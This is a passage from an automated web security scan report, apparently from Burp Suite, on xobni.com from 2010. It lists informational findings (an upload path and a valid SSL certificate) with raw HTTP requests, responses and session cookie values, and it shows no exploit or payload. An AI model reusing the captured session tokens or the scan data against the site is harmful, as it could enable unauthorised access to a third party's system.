Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 147
Connection: close
Content-Type: text/html

<HTML>
<HEAD><TITLE>FAQ</TITLE></HEAD>
<BODY style="font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; font-size: 8pt;">
</BODY>
</HTML>

17.5. http://www.xobni.com/support/upload/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /support/upload/

Request

GET /support/upload/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2996
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fla
...[SNIP]...

18. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.xobni.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.xobni.com
Issued by:  Equifax Secure Global eBusiness CA-1
Valid from:  Wed Sep 10 14:57:43 CDT 2008
Valid to:  Tue Sep 10 14:57:43 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Global eBusiness CA-1
Issued by:  Equifax Secure Global eBusiness CA-1
Valid from:  Sun Jun 20 23:00:00 CDT 1999
Valid to:  Sat Jun 20 23:00:00 CDT 2020

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
